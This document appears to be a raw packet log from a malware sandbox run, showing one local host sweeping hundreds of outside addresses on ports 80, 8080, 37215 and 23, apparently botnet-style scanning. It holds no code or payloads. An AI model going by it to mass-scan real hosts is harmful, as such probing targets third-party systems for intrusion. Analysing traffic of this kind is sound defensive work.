                                                              Nov 13, 2023 22:18:01.844104052 CET1343680192.168.2.23112.116.180.148
                                                              Nov 13, 2023 22:18:01.844120979 CET1343680192.168.2.23112.90.208.0
                                                              Nov 13, 2023 22:18:01.844145060 CET1343680192.168.2.23112.30.248.36
                                                              Nov 13, 2023 22:18:01.844165087 CET1343680192.168.2.23112.226.200.198
                                                              Nov 13, 2023 22:18:01.844183922 CET1343680192.168.2.23112.212.117.99
                                                              Nov 13, 2023 22:18:01.844228029 CET1343680192.168.2.23112.37.164.143
                                                              Nov 13, 2023 22:18:01.844244957 CET1343680192.168.2.23112.162.87.235
                                                              Nov 13, 2023 22:18:01.844259977 CET1343680192.168.2.23112.89.107.131
                                                              Nov 13, 2023 22:18:01.844309092 CET1343680192.168.2.23112.19.37.134
                                                              Nov 13, 2023 22:18:01.844326973 CET1343680192.168.2.23112.183.223.26
                                                              Nov 13, 2023 22:18:01.844342947 CET1343680192.168.2.23112.118.231.98
                                                              Nov 13, 2023 22:18:01.844382048 CET1343680192.168.2.23112.88.198.148
                                                              Nov 13, 2023 22:18:01.844409943 CET1343680192.168.2.23112.54.90.180
                                                              Nov 13, 2023 22:18:01.844409943 CET8051982112.125.221.109192.168.2.23
                                                              Nov 13, 2023 22:18:01.844481945 CET1343680192.168.2.23112.4.209.100
                                                              Nov 13, 2023 22:18:01.844525099 CET8051982112.125.221.109192.168.2.23
                                                              Nov 13, 2023 22:18:01.844536066 CET1343680192.168.2.23112.67.15.11
                                                              Nov 13, 2023 22:18:01.844552994 CET1343680192.168.2.23112.52.221.61
                                                              Nov 13, 2023 22:18:01.844582081 CET5198280192.168.2.23112.125.221.109
                                                              Nov 13, 2023 22:18:01.844629049 CET1343680192.168.2.23112.63.55.17
                                                              Nov 13, 2023 22:18:01.844631910 CET1343680192.168.2.23112.64.103.92
                                                              Nov 13, 2023 22:18:01.844631910 CET1343680192.168.2.23112.31.19.200
                                                              Nov 13, 2023 22:18:01.844650030 CET1343680192.168.2.23112.99.99.246
                                                              Nov 13, 2023 22:18:01.844671965 CET1343680192.168.2.23112.82.111.29
                                                              Nov 13, 2023 22:18:01.844693899 CET1343680192.168.2.23112.14.112.223
                                                              Nov 13, 2023 22:18:01.844712973 CET1343680192.168.2.23112.73.116.84
                                                              Nov 13, 2023 22:18:01.844737053 CET1343680192.168.2.23112.216.142.25
                                                              Nov 13, 2023 22:18:01.844769001 CET1343680192.168.2.23112.216.109.163
                                                              Nov 13, 2023 22:18:01.844814062 CET1343680192.168.2.23112.178.149.96
                                                              Nov 13, 2023 22:18:01.844834089 CET1343680192.168.2.23112.138.163.219
                                                              Nov 13, 2023 22:18:01.844852924 CET1343680192.168.2.23112.250.190.18
                                                              Nov 13, 2023 22:18:01.844878912 CET1343680192.168.2.23112.88.34.229
                                                              Nov 13, 2023 22:18:01.844897032 CET1343680192.168.2.23112.163.192.125
                                                              Nov 13, 2023 22:18:01.844940901 CET1343680192.168.2.23112.180.86.199
                                                              Nov 13, 2023 22:18:01.844954014 CET1343680192.168.2.23112.62.86.56
                                                              Nov 13, 2023 22:18:01.844975948 CET1343680192.168.2.23112.136.84.183
                                                              Nov 13, 2023 22:18:01.845002890 CET1343680192.168.2.23112.168.125.30
                                                              Nov 13, 2023 22:18:01.845026016 CET1343680192.168.2.23112.239.57.127
                                                              Nov 13, 2023 22:18:01.845052004 CET1343680192.168.2.23112.151.245.161
                                                              Nov 13, 2023 22:18:01.845073938 CET1343680192.168.2.23112.194.149.174
                                                              Nov 13, 2023 22:18:01.845093966 CET1343680192.168.2.23112.39.227.11
                                                              Nov 13, 2023 22:18:01.845109940 CET1343680192.168.2.23112.30.70.37
                                                              Nov 13, 2023 22:18:01.845128059 CET1343680192.168.2.23112.105.95.10
                                                              Nov 13, 2023 22:18:01.845144033 CET1343680192.168.2.23112.85.171.22
                                                              Nov 13, 2023 22:18:01.845201015 CET1343680192.168.2.23112.241.171.165
                                                              Nov 13, 2023 22:18:01.845223904 CET1343680192.168.2.23112.84.154.67
                                                              Nov 13, 2023 22:18:01.845249891 CET1343680192.168.2.23112.23.198.123
                                                              Nov 13, 2023 22:18:01.845249891 CET1343680192.168.2.23112.128.46.92
                                                              Nov 13, 2023 22:18:01.845249891 CET1343680192.168.2.23112.182.60.191
                                                              Nov 13, 2023 22:18:01.845298052 CET1343680192.168.2.23112.214.233.164
                                                              Nov 13, 2023 22:18:01.845316887 CET1343680192.168.2.23112.21.68.217
                                                              Nov 13, 2023 22:18:01.845340014 CET1343680192.168.2.23112.241.104.252
                                                              Nov 13, 2023 22:18:01.845365047 CET1343680192.168.2.23112.90.115.242
                                                              Nov 13, 2023 22:18:01.845390081 CET1343680192.168.2.23112.53.17.51
                                                              Nov 13, 2023 22:18:01.845448017 CET1343680192.168.2.23112.191.1.70
                                                              Nov 13, 2023 22:18:01.845484972 CET1343680192.168.2.23112.110.75.45
                                                              Nov 13, 2023 22:18:01.845499992 CET1343680192.168.2.23112.96.181.82
                                                              Nov 13, 2023 22:18:01.845499992 CET1343680192.168.2.23112.243.35.42
                                                              Nov 13, 2023 22:18:01.845513105 CET1343680192.168.2.23112.220.96.134
                                                              Nov 13, 2023 22:18:01.845546961 CET1343680192.168.2.23112.83.24.110
                                                              Nov 13, 2023 22:18:01.845568895 CET1343680192.168.2.23112.18.239.151
                                                              Nov 13, 2023 22:18:01.845585108 CET1343680192.168.2.23112.35.206.152
                                                              Nov 13, 2023 22:18:01.845602036 CET1343680192.168.2.23112.153.141.101
                                                              Nov 13, 2023 22:18:01.845619917 CET1343680192.168.2.23112.182.8.139
                                                              Nov 13, 2023 22:18:01.845640898 CET1343680192.168.2.23112.28.214.199
                                                              Nov 13, 2023 22:18:01.845668077 CET1343680192.168.2.23112.6.186.254
                                                              Nov 13, 2023 22:18:01.845707893 CET1343680192.168.2.23112.204.144.253
                                                              Nov 13, 2023 22:18:01.845732927 CET1343680192.168.2.23112.166.202.138
                                                              Nov 13, 2023 22:18:01.845733881 CET1343680192.168.2.23112.148.6.68
                                                              Nov 13, 2023 22:18:01.845746040 CET1343680192.168.2.23112.7.155.82
                                                              Nov 13, 2023 22:18:01.845766068 CET1343680192.168.2.23112.62.53.138
                                                              Nov 13, 2023 22:18:01.845802069 CET1343680192.168.2.23112.13.147.131
                                                              Nov 13, 2023 22:18:01.845805883 CET1343680192.168.2.23112.197.170.67
                                                              Nov 13, 2023 22:18:01.845832109 CET1343680192.168.2.23112.247.109.136
                                                              Nov 13, 2023 22:18:01.845850945 CET1343680192.168.2.23112.203.230.176
                                                              Nov 13, 2023 22:18:01.845890999 CET1343680192.168.2.23112.215.96.169
                                                              Nov 13, 2023 22:18:01.845949888 CET1343680192.168.2.23112.43.250.108
                                                              Nov 13, 2023 22:18:01.845971107 CET1343680192.168.2.23112.131.100.104
                                                              Nov 13, 2023 22:18:01.845985889 CET1343680192.168.2.23112.20.114.239
                                                              Nov 13, 2023 22:18:01.846016884 CET1343680192.168.2.23112.240.199.33
                                                              Nov 13, 2023 22:18:01.846029997 CET1343680192.168.2.23112.137.168.57
                                                              Nov 13, 2023 22:18:01.846029997 CET1343680192.168.2.23112.115.42.239
                                                              Nov 13, 2023 22:18:01.846049070 CET1343680192.168.2.23112.129.94.242
                                                              Nov 13, 2023 22:18:01.846062899 CET1343680192.168.2.23112.75.64.155
                                                              Nov 13, 2023 22:18:01.846087933 CET1343680192.168.2.23112.59.225.160
                                                              Nov 13, 2023 22:18:01.846107006 CET1343680192.168.2.23112.88.209.69
                                                              Nov 13, 2023 22:18:01.846131086 CET1343680192.168.2.23112.115.91.218
                                                              Nov 13, 2023 22:18:01.846148968 CET1343680192.168.2.23112.251.143.77
                                                              Nov 13, 2023 22:18:01.846168041 CET1343680192.168.2.23112.0.212.116
                                                              Nov 13, 2023 22:18:01.846196890 CET1343680192.168.2.23112.158.159.135
                                                              Nov 13, 2023 22:18:01.846213102 CET1343680192.168.2.23112.109.233.213
                                                              Nov 13, 2023 22:18:01.846230984 CET1343680192.168.2.23112.193.38.20
                                                              Nov 13, 2023 22:18:01.846254110 CET1343680192.168.2.23112.26.92.39
                                                              Nov 13, 2023 22:18:01.846266985 CET1343680192.168.2.23112.252.247.201
                                                              Nov 13, 2023 22:18:01.846292019 CET1343680192.168.2.23112.233.147.191
                                                              Nov 13, 2023 22:18:01.846334934 CET1343680192.168.2.23112.111.207.225
                                                              Nov 13, 2023 22:18:01.846334934 CET1343680192.168.2.23112.66.151.82
                                                              Nov 13, 2023 22:18:01.846359968 CET1343680192.168.2.23112.93.7.48
                                                              Nov 13, 2023 22:18:01.846374989 CET1343680192.168.2.23112.115.32.231
                                                              Nov 13, 2023 22:18:01.846396923 CET1343680192.168.2.23112.146.208.52
                                                              Nov 13, 2023 22:18:01.846412897 CET1343680192.168.2.23112.111.76.135
                                                              Nov 13, 2023 22:18:01.846442938 CET1343680192.168.2.23112.203.80.123
                                                              Nov 13, 2023 22:18:01.846460104 CET1343680192.168.2.23112.249.161.15
                                                              Nov 13, 2023 22:18:01.846508980 CET1343680192.168.2.23112.231.239.95
                                                              Nov 13, 2023 22:18:01.846519947 CET1343680192.168.2.23112.106.202.141
                                                              Nov 13, 2023 22:18:01.846534967 CET1343680192.168.2.23112.214.249.51
                                                              Nov 13, 2023 22:18:01.846554041 CET1343680192.168.2.23112.210.62.62
                                                              Nov 13, 2023 22:18:01.846576929 CET1343680192.168.2.23112.152.238.137
                                                              Nov 13, 2023 22:18:01.846600056 CET1343680192.168.2.23112.75.112.70
                                                              Nov 13, 2023 22:18:01.846628904 CET1343680192.168.2.23112.237.142.61
                                                              Nov 13, 2023 22:18:01.846673012 CET1343680192.168.2.23112.193.145.152
                                                              Nov 13, 2023 22:18:01.846702099 CET1343680192.168.2.23112.216.193.17
                                                              Nov 13, 2023 22:18:01.846729040 CET1343680192.168.2.23112.218.139.216
                                                              Nov 13, 2023 22:18:01.846750021 CET1343680192.168.2.23112.34.191.131
                                                              Nov 13, 2023 22:18:01.846766949 CET1343680192.168.2.23112.220.3.15
                                                              Nov 13, 2023 22:18:01.846812963 CET1343680192.168.2.23112.152.107.92
                                                              Nov 13, 2023 22:18:01.846839905 CET1343680192.168.2.23112.112.120.238
                                                              Nov 13, 2023 22:18:01.846848965 CET1343680192.168.2.23112.9.224.148
                                                              Nov 13, 2023 22:18:01.846869946 CET1343680192.168.2.23112.232.204.13
                                                              Nov 13, 2023 22:18:01.846894979 CET1343680192.168.2.23112.248.54.87
                                                              Nov 13, 2023 22:18:01.846930027 CET1343680192.168.2.23112.97.215.69
                                                              Nov 13, 2023 22:18:01.846950054 CET1343680192.168.2.23112.35.254.5
                                                              Nov 13, 2023 22:18:01.847007036 CET1343680192.168.2.23112.82.62.139
                                                              Nov 13, 2023 22:18:01.847052097 CET1343680192.168.2.23112.251.145.91
                                                              Nov 13, 2023 22:18:01.847052097 CET1343680192.168.2.23112.131.72.242
                                                              Nov 13, 2023 22:18:01.847055912 CET1343680192.168.2.23112.179.204.93
                                                              Nov 13, 2023 22:18:01.847084045 CET1343680192.168.2.23112.90.102.158
                                                              Nov 13, 2023 22:18:01.847114086 CET1343680192.168.2.23112.138.180.160
                                                              Nov 13, 2023 22:18:01.847137928 CET1343680192.168.2.23112.203.12.148
                                                              Nov 13, 2023 22:18:01.847161055 CET1343680192.168.2.23112.134.99.68
                                                              Nov 13, 2023 22:18:01.847182989 CET1343680192.168.2.23112.218.88.25
                                                              Nov 13, 2023 22:18:01.847218037 CET1343680192.168.2.23112.124.45.41
                                                              Nov 13, 2023 22:18:01.847248077 CET1343680192.168.2.23112.18.150.230
                                                              Nov 13, 2023 22:18:01.847263098 CET1343680192.168.2.23112.120.27.162
                                                              Nov 13, 2023 22:18:01.847279072 CET1343680192.168.2.23112.101.221.239
                                                              Nov 13, 2023 22:18:01.847305059 CET1343680192.168.2.23112.141.28.45
                                                              Nov 13, 2023 22:18:01.847347975 CET1343680192.168.2.23112.100.167.133
                                                              Nov 13, 2023 22:18:01.847367048 CET1343680192.168.2.23112.221.112.150
                                                              Nov 13, 2023 22:18:01.847451925 CET1343680192.168.2.23112.203.114.171
                                                              Nov 13, 2023 22:18:01.847474098 CET1343680192.168.2.23112.131.13.182
                                                              Nov 13, 2023 22:18:01.847513914 CET1343680192.168.2.23112.139.129.253
                                                              Nov 13, 2023 22:18:01.847521067 CET1343680192.168.2.23112.97.27.51
                                                              Nov 13, 2023 22:18:01.847521067 CET1343680192.168.2.23112.15.130.170
                                                              Nov 13, 2023 22:18:01.847538948 CET1343680192.168.2.23112.176.235.159
                                                              Nov 13, 2023 22:18:01.847573996 CET1343680192.168.2.23112.182.187.48
                                                              Nov 13, 2023 22:18:01.847614050 CET1343680192.168.2.23112.230.93.108
                                                              Nov 13, 2023 22:18:01.847629070 CET1343680192.168.2.23112.119.21.200
                                                              Nov 13, 2023 22:18:01.847683907 CET1343680192.168.2.23112.177.5.210
                                                              Nov 13, 2023 22:18:01.857145071 CET8052002112.125.221.109192.168.2.23
                                                              Nov 13, 2023 22:18:01.857165098 CET8042840112.125.160.163192.168.2.23
                                                              Nov 13, 2023 22:18:01.857178926 CET8042820112.125.160.163192.168.2.23
                                                              Nov 13, 2023 22:18:01.857192993 CET8042820112.125.160.163192.168.2.23
                                                              Nov 13, 2023 22:18:01.857264996 CET4282080192.168.2.23112.125.160.163
                                                              Nov 13, 2023 22:18:01.857266903 CET4284080192.168.2.23112.125.160.163
                                                              Nov 13, 2023 22:18:01.857269049 CET5200280192.168.2.23112.125.221.109
                                                              Nov 13, 2023 22:18:01.857336998 CET5200280192.168.2.23112.125.221.109
                                                              Nov 13, 2023 22:18:01.857337952 CET4284080192.168.2.23112.125.160.163
                                                              Nov 13, 2023 22:18:01.931071997 CET8050884112.90.90.216192.168.2.23
                                                              Nov 13, 2023 22:18:01.931087017 CET8050884112.90.90.216192.168.2.23
                                                              Nov 13, 2023 22:18:01.931123018 CET8050884112.90.90.216192.168.2.23
                                                              Nov 13, 2023 22:18:01.931133986 CET8050884112.90.90.216192.168.2.23
                                                              Nov 13, 2023 22:18:01.931174040 CET8050904112.90.90.216192.168.2.23
                                                              Nov 13, 2023 22:18:01.931238890 CET5088480192.168.2.23112.90.90.216
                                                              Nov 13, 2023 22:18:01.931238890 CET5088480192.168.2.23112.90.90.216
                                                              Nov 13, 2023 22:18:01.931258917 CET5090480192.168.2.23112.90.90.216
                                                              Nov 13, 2023 22:18:01.931405067 CET5090480192.168.2.23112.90.90.216
                                                              Nov 13, 2023 22:18:01.937813044 CET80801394885.153.121.151192.168.2.23
                                                              Nov 13, 2023 22:18:01.986978054 CET2311388208.126.195.187192.168.2.23
                                                              Nov 13, 2023 22:18:01.989398003 CET80801394885.8.188.170192.168.2.23
                                                              Nov 13, 2023 22:18:01.994189978 CET80801394862.32.114.251192.168.2.23
                                                              Nov 13, 2023 22:18:01.994337082 CET80801394831.32.39.32192.168.2.23
                                                              Nov 13, 2023 22:18:01.997922897 CET2311388172.120.117.245192.168.2.23
                                                              Nov 13, 2023 22:18:02.000893116 CET80801394862.28.25.177192.168.2.23
                                                              Nov 13, 2023 22:18:02.002583981 CET80801394831.192.226.202192.168.2.23
                                                              Nov 13, 2023 22:18:02.008553982 CET80801394894.152.162.160192.168.2.23
                                                              Nov 13, 2023 22:18:02.011646986 CET80801394862.63.213.51192.168.2.23
                                                              Nov 13, 2023 22:18:02.014754057 CET80801394894.237.25.119192.168.2.23
                                                              Nov 13, 2023 22:18:02.016103983 CET80801394862.161.4.234192.168.2.23
                                                              Nov 13, 2023 22:18:02.017544031 CET80801394862.83.3.149192.168.2.23
                                                              Nov 13, 2023 22:18:02.019408941 CET80801394885.235.93.78192.168.2.23
                                                              Nov 13, 2023 22:18:02.023689032 CET80801394895.236.163.7192.168.2.23
                                                              Nov 13, 2023 22:18:02.027067900 CET80801394862.86.100.65192.168.2.23
                                                              Nov 13, 2023 22:18:02.029840946 CET80801394831.131.229.193192.168.2.23
                                                              Nov 13, 2023 22:18:02.032392025 CET80801394894.77.70.21192.168.2.23
                                                              Nov 13, 2023 22:18:02.033610106 CET80801394862.196.147.210192.168.2.23
                                                              Nov 13, 2023 22:18:02.037288904 CET80801394894.141.106.49192.168.2.23
                                                              Nov 13, 2023 22:18:02.039891958 CET80801394894.30.243.38192.168.2.23
                                                              Nov 13, 2023 22:18:02.046205997 CET80801394894.77.97.41192.168.2.23
                                                              Nov 13, 2023 22:18:02.046328068 CET372151266041.45.74.148192.168.2.23
                                                              Nov 13, 2023 22:18:02.046876907 CET80801394862.112.115.32192.168.2.23
                                                              Nov 13, 2023 22:18:02.052057028 CET80801394895.125.154.195192.168.2.23
                                                              Nov 13, 2023 22:18:02.053215981 CET80805172885.125.241.169192.168.2.23
                                                              Nov 13, 2023 22:18:02.053366899 CET517288080192.168.2.2385.125.241.169
                                                              Nov 13, 2023 22:18:02.054649115 CET80801394831.44.129.116192.168.2.23
                                                              Nov 13, 2023 22:18:02.054723978 CET139488080192.168.2.2331.44.129.116
                                                              Nov 13, 2023 22:18:02.063750029 CET80801394885.174.227.143192.168.2.23
                                                              Nov 13, 2023 22:18:02.063831091 CET139488080192.168.2.2385.174.227.143
                                                              Nov 13, 2023 22:18:02.065701008 CET80801394894.77.118.21192.168.2.23
                                                              Nov 13, 2023 22:18:02.066916943 CET80801394831.146.24.146192.168.2.23
                                                              Nov 13, 2023 22:18:02.068732023 CET80804746094.120.253.94192.168.2.23
                                                              Nov 13, 2023 22:18:02.074470997 CET372151266041.225.240.246192.168.2.23
                                                              Nov 13, 2023 22:18:02.076802015 CET80801394885.235.37.85192.168.2.23
                                                              Nov 13, 2023 22:18:02.094131947 CET2311388126.178.159.150192.168.2.23
                                                              Nov 13, 2023 22:18:02.095222950 CET80806075262.121.130.167192.168.2.23
                                                              Nov 13, 2023 22:18:02.095350981 CET80801394885.133.222.67192.168.2.23
                                                              Nov 13, 2023 22:18:02.096050978 CET80806073062.121.130.167192.168.2.23
                                                              Nov 13, 2023 22:18:02.096065044 CET80806073062.121.130.167192.168.2.23
                                                              Nov 13, 2023 22:18:02.096120119 CET607308080192.168.2.2362.121.130.167
                                                              Nov 13, 2023 22:18:02.096120119 CET607308080192.168.2.2362.121.130.167
                                                              Nov 13, 2023 22:18:02.112742901 CET8057258112.4.150.142192.168.2.23
                                                              Nov 13, 2023 22:18:02.112792969 CET8057258112.4.150.142192.168.2.23
                                                              Nov 13, 2023 22:18:02.112807035 CET8057258112.4.150.142192.168.2.23
                                                              Nov 13, 2023 22:18:02.112896919 CET5725880192.168.2.23112.4.150.142
                                                              Nov 13, 2023 22:18:02.112920046 CET5725880192.168.2.23112.4.150.142
                                                              Nov 13, 2023 22:18:02.122987986 CET8057278112.4.150.142192.168.2.23
                                                              Nov 13, 2023 22:18:02.123109102 CET5727880192.168.2.23112.4.150.142
                                                              Nov 13, 2023 22:18:02.123171091 CET5727880192.168.2.23112.4.150.142
                                                              Nov 13, 2023 22:18:02.139728069 CET80801394885.15.120.137192.168.2.23
                                                              Nov 13, 2023 22:18:02.143982887 CET8013436112.210.12.18192.168.2.23
                                                              Nov 13, 2023 22:18:02.149719954 CET8013436112.210.62.62192.168.2.23
                                                              Nov 13, 2023 22:18:02.154580116 CET8013436112.203.114.171192.168.2.23
                                                              Nov 13, 2023 22:18:02.157201052 CET8013436112.179.204.93192.168.2.23
                                                              Nov 13, 2023 22:18:02.158588886 CET80806075262.121.130.167192.168.2.23
                                                              Nov 13, 2023 22:18:02.158605099 CET8034226112.125.190.166192.168.2.23
                                                              Nov 13, 2023 22:18:02.158683062 CET607528080192.168.2.2362.121.130.167
                                                              Nov 13, 2023 22:18:02.159074068 CET8013436112.125.173.154192.168.2.23
                                                              Nov 13, 2023 22:18:02.159137964 CET1343680192.168.2.23112.125.173.154
                                                              Nov 13, 2023 22:18:02.161324978 CET8013436112.216.142.25192.168.2.23
                                                              Nov 13, 2023 22:18:02.161725044 CET8013436112.220.96.134192.168.2.23
                                                              Nov 13, 2023 22:18:02.164952993 CET372151266041.175.7.147192.168.2.23
                                                              Nov 13, 2023 22:18:02.167558908 CET8013436112.218.88.25192.168.2.23
                                                              Nov 13, 2023 22:18:02.171955109 CET8042840112.125.160.163192.168.2.23
                                                              Nov 13, 2023 22:18:02.173051119 CET8052002112.125.221.109192.168.2.23
                                                              Nov 13, 2023 22:18:02.276402950 CET80801394895.127.220.49192.168.2.23
                                                              Nov 13, 2023 22:18:02.289056063 CET8050904112.90.90.216192.168.2.23
                                                              Nov 13, 2023 22:18:02.289158106 CET5090480192.168.2.23112.90.90.216
                                                              Nov 13, 2023 22:18:02.389251947 CET424108080192.168.2.2331.136.200.160
                                                              Nov 13, 2023 22:18:02.389334917 CET363688080192.168.2.2395.110.226.189
                                                              Nov 13, 2023 22:18:02.444806099 CET80801394895.126.78.56192.168.2.23
                                                              Nov 13, 2023 22:18:02.453282118 CET449428080192.168.2.2394.120.12.219
                                                              Nov 13, 2023 22:18:02.582113028 CET8057278112.4.150.142192.168.2.23
                                                              Nov 13, 2023 22:18:02.582235098 CET5727880192.168.2.23112.4.150.142
                                                              Nov 13, 2023 22:18:02.677167892 CET424328080192.168.2.2331.136.200.160
                                                              Nov 13, 2023 22:18:02.681915045 CET1266037215192.168.2.23197.32.138.74
                                                              Nov 13, 2023 22:18:02.681930065 CET1266037215192.168.2.23197.101.76.79
                                                              Nov 13, 2023 22:18:02.681946039 CET1266037215192.168.2.23197.189.255.187
                                                              Nov 13, 2023 22:18:02.681958914 CET1266037215192.168.2.23197.7.23.221
                                                              Nov 13, 2023 22:18:02.681981087 CET1266037215192.168.2.23197.166.225.70
                                                              Nov 13, 2023 22:18:02.682008982 CET1266037215192.168.2.23197.126.191.46
                                                              Nov 13, 2023 22:18:02.682034969 CET1266037215192.168.2.23197.177.48.204
                                                              Nov 13, 2023 22:18:02.682081938 CET1266037215192.168.2.23197.231.82.148
                                                              Nov 13, 2023 22:18:02.682102919 CET1266037215192.168.2.23197.24.69.229
                                                              Nov 13, 2023 22:18:02.682104111 CET1266037215192.168.2.23197.167.141.2
                                                              Nov 13, 2023 22:18:02.682130098 CET1266037215192.168.2.23197.1.153.72
                                                              Nov 13, 2023 22:18:02.682132006 CET1266037215192.168.2.23197.236.22.188
                                                              Nov 13, 2023 22:18:02.682157040 CET1266037215192.168.2.23197.67.47.46
                                                              Nov 13, 2023 22:18:02.682168007 CET1266037215192.168.2.23197.97.120.178
                                                              Nov 13, 2023 22:18:02.682225943 CET1266037215192.168.2.23197.83.16.80
                                                              Nov 13, 2023 22:18:02.682250977 CET1266037215192.168.2.23197.227.169.233
                                                              Nov 13, 2023 22:18:02.682281971 CET1266037215192.168.2.23197.239.38.83
                                                              Nov 13, 2023 22:18:02.682301044 CET1266037215192.168.2.23197.84.11.97
                                                              Nov 13, 2023 22:18:02.682317972 CET1266037215192.168.2.23197.195.194.68
                                                              Nov 13, 2023 22:18:02.682334900 CET1266037215192.168.2.23197.50.167.44
                                                              Nov 13, 2023 22:18:02.682348967 CET1266037215192.168.2.23197.154.3.137
                                                              Nov 13, 2023 22:18:02.682372093 CET1266037215192.168.2.23197.138.2.32
                                                              Nov 13, 2023 22:18:02.682388067 CET1266037215192.168.2.23197.188.77.27
                                                              Nov 13, 2023 22:18:02.682415009 CET1266037215192.168.2.23197.92.136.215
                                                              Nov 13, 2023 22:18:02.682454109 CET1266037215192.168.2.23197.114.255.43
                                                              Nov 13, 2023 22:18:02.682472944 CET1266037215192.168.2.23197.82.141.226
                                                              Nov 13, 2023 22:18:02.682493925 CET1266037215192.168.2.23197.19.249.9
                                                              Nov 13, 2023 22:18:02.682506084 CET1266037215192.168.2.23197.76.16.183
                                                              Nov 13, 2023 22:18:02.682539940 CET1266037215192.168.2.23197.179.218.103
                                                              Nov 13, 2023 22:18:02.682542086 CET1266037215192.168.2.23197.188.65.89
                                                              Nov 13, 2023 22:18:02.682565928 CET1266037215192.168.2.23197.157.134.78
                                                              Nov 13, 2023 22:18:02.682604074 CET1266037215192.168.2.23197.28.81.157
                                                              Nov 13, 2023 22:18:02.682605028 CET1266037215192.168.2.23197.166.175.71
                                                              Nov 13, 2023 22:18:02.682626009 CET1266037215192.168.2.23197.134.251.83
                                                              Nov 13, 2023 22:18:02.682640076 CET1266037215192.168.2.23197.17.9.138
                                                              Nov 13, 2023 22:18:02.682662010 CET1266037215192.168.2.23197.177.100.217
                                                              Nov 13, 2023 22:18:02.682676077 CET1266037215192.168.2.23197.84.15.168
                                                              Nov 13, 2023 22:18:02.682734013 CET1266037215192.168.2.23197.70.211.17
                                                              Nov 13, 2023 22:18:02.682737112 CET1266037215192.168.2.23197.205.186.79
                                                              Nov 13, 2023 22:18:02.682748079 CET1266037215192.168.2.23197.72.136.22
                                                              Nov 13, 2023 22:18:02.682769060 CET1266037215192.168.2.23197.77.39.16
                                                              Nov 13, 2023 22:18:02.682790995 CET1266037215192.168.2.23197.198.54.255
                                                              Nov 13, 2023 22:18:02.682806969 CET1266037215192.168.2.23197.245.11.34
                                                              Nov 13, 2023 22:18:02.682825089 CET1266037215192.168.2.23197.182.14.134
                                                              Nov 13, 2023 22:18:02.682842016 CET1266037215192.168.2.23197.198.115.135
                                                              Nov 13, 2023 22:18:02.682854891 CET1266037215192.168.2.23197.225.130.160
                                                              Nov 13, 2023 22:18:02.682881117 CET1266037215192.168.2.23197.50.158.52
                                                              Nov 13, 2023 22:18:02.682893991 CET1266037215192.168.2.23197.39.30.158
                                                              Nov 13, 2023 22:18:02.682917118 CET1266037215192.168.2.23197.16.10.76
                                                              Nov 13, 2023 22:18:02.682928085 CET1266037215192.168.2.23197.2.93.9
                                                              Nov 13, 2023 22:18:02.682950974 CET1266037215192.168.2.23197.198.162.159
                                                              Nov 13, 2023 22:18:02.682970047 CET1266037215192.168.2.23197.253.35.152
                                                              Nov 13, 2023 22:18:02.682991982 CET1266037215192.168.2.23197.24.206.46
                                                              Nov 13, 2023 22:18:02.683028936 CET1266037215192.168.2.23197.244.169.220
                                                              Nov 13, 2023 22:18:02.683058023 CET1266037215192.168.2.23197.245.86.81
                                                              Nov 13, 2023 22:18:02.683074951 CET1266037215192.168.2.23197.78.25.231
                                                              Nov 13, 2023 22:18:02.683089018 CET1266037215192.168.2.23197.64.224.128
                                                              Nov 13, 2023 22:18:02.683092117 CET1266037215192.168.2.23197.4.22.171
                                                              Nov 13, 2023 22:18:02.683125019 CET1266037215192.168.2.23197.189.106.42
                                                              Nov 13, 2023 22:18:02.683144093 CET1266037215192.168.2.23197.151.24.122
                                                              Nov 13, 2023 22:18:02.683162928 CET1266037215192.168.2.23197.93.157.114
                                                              Nov 13, 2023 22:18:02.683185101 CET1266037215192.168.2.23197.155.223.210
                                                              Nov 13, 2023 22:18:02.683202028 CET1266037215192.168.2.23197.22.4.115
                                                              Nov 13, 2023 22:18:02.683232069 CET1266037215192.168.2.23197.128.69.42
                                                              Nov 13, 2023 22:18:02.683234930 CET1266037215192.168.2.23197.238.48.208
                                                              Nov 13, 2023 22:18:02.683249950 CET1266037215192.168.2.23197.13.219.184
                                                              Nov 13, 2023 22:18:02.683281898 CET1266037215192.168.2.23197.154.1.224
                                                              Nov 13, 2023 22:18:02.683304071 CET1266037215192.168.2.23197.0.72.246
                                                              Nov 13, 2023 22:18:02.683305979 CET1266037215192.168.2.23197.45.181.62
                                                              Nov 13, 2023 22:18:02.683325052 CET1266037215192.168.2.23197.220.253.210
                                                              Nov 13, 2023 22:18:02.683360100 CET1266037215192.168.2.23197.205.150.184
                                                              Nov 13, 2023 22:18:02.683379889 CET1266037215192.168.2.23197.69.200.229
                                                              Nov 13, 2023 22:18:02.683403969 CET1266037215192.168.2.23197.111.246.102
                                                              Nov 13, 2023 22:18:02.683439016 CET1266037215192.168.2.23197.185.152.110
                                                              Nov 13, 2023 22:18:02.683469057 CET1266037215192.168.2.23197.204.172.3
                                                              Nov 13, 2023 22:18:02.683479071 CET1266037215192.168.2.23197.83.13.39
                                                              Nov 13, 2023 22:18:02.683495045 CET1266037215192.168.2.23197.145.220.212
                                                              Nov 13, 2023 22:18:02.683514118 CET1266037215192.168.2.23197.114.18.190
                                                              Nov 13, 2023 22:18:02.683543921 CET1266037215192.168.2.23197.66.225.184
                                                              Nov 13, 2023 22:18:02.683568001 CET1266037215192.168.2.23197.205.51.57
                                                              Nov 13, 2023 22:18:02.683623075 CET1266037215192.168.2.23197.174.242.151
                                                              Nov 13, 2023 22:18:02.683639050 CET1266037215192.168.2.23197.254.130.164
                                                              Nov 13, 2023 22:18:02.683655977 CET1266037215192.168.2.23197.229.163.179
                                                              Nov 13, 2023 22:18:02.683674097 CET1266037215192.168.2.23197.219.165.49
                                                              Nov 13, 2023 22:18:02.683674097 CET1266037215192.168.2.23197.224.92.218
                                                              Nov 13, 2023 22:18:02.683675051 CET1266037215192.168.2.23197.175.76.137
                                                              Nov 13, 2023 22:18:02.683695078 CET1266037215192.168.2.23197.174.27.160
                                                              Nov 13, 2023 22:18:02.683716059 CET1266037215192.168.2.23197.210.56.6
                                                              Nov 13, 2023 22:18:02.683752060 CET1266037215192.168.2.23197.2.90.120
                                                              Nov 13, 2023 22:18:02.683759928 CET1266037215192.168.2.23197.174.42.84
                                                              Nov 13, 2023 22:18:02.683787107 CET1266037215192.168.2.23197.53.65.249
                                                              Nov 13, 2023 22:18:02.683809996 CET1266037215192.168.2.23197.190.63.224
                                                              Nov 13, 2023 22:18:02.683830023 CET1266037215192.168.2.23197.178.182.94
                                                              Nov 13, 2023 22:18:02.683849096 CET1266037215192.168.2.23197.90.119.151
                                                              Nov 13, 2023 22:18:02.683873892 CET1266037215192.168.2.23197.206.223.184
